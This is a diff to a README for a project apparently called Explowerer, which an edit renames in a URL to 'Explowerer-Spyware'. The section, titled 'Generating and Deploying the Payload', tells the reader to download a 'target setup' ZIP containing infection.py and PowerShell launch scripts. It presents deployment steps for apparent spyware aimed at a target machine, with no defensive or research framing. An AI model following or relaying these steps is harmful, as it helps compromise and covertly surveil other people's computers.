PowerPizza/Explowerer-Server/readme.md

 ## 2. Generating and Deploying the Payload
 * Install Python on your computer from the official website [python.org](https://www.python.org/downloads)

-* Downloading the ZIP file of target setup from https://raw.githubusercontent.com/PowerPizza/Explowerer-Server/master/backend/target_work/target_work.zip
+* Downloading the ZIP file of target setup from [Target Setup](https://raw.githubusercontent.com/PowerPizza/Explowerer-Spyware/master/backend/target_work/target_work.zip)

 * Extract the zip files into a folder - there will be `infection.py` `launch1.ps1` `launch2.ps1` etc... files in it.